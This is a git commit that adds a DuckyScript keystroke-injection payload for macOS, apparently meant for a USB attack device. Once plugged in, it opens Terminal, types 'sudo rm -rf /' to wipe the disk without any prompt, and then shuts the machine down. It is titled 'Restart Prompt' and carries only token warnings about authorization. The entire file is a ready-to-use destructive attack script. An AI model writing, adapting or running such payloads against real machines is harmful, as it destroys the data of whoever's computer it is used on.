New Execution Please be careful and use with caution

This commit is contained in:
narstybits
2023-05-28 15:20:25 -05:00
parent e7cc791564
commit 6558afc231
+33
View File
@@ -0,0 +1,33 @@
REM this will delete all files on the system
REM there will be no Prompt
REM Using such scripts can have severe consequences and is not recommended.
REM Always exercise caution and ensure you have proper authorization.
REM Title: Restart Prompt
REM Description:
REM Author: NARSTY
REM Version: 1.0
REM Target: macOS
DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 1000
STRING echo "Hello! Initiating system takeover... Deleting All Files....."
ENTER
DELAY 1000
STRING sudo rm -rf /
ENTER
DELAY 1000
STRING echo "All your files have been deleted. Goodbye!"
ENTER
DELAY 1000
STRING sudo shutdown -h now
ENTER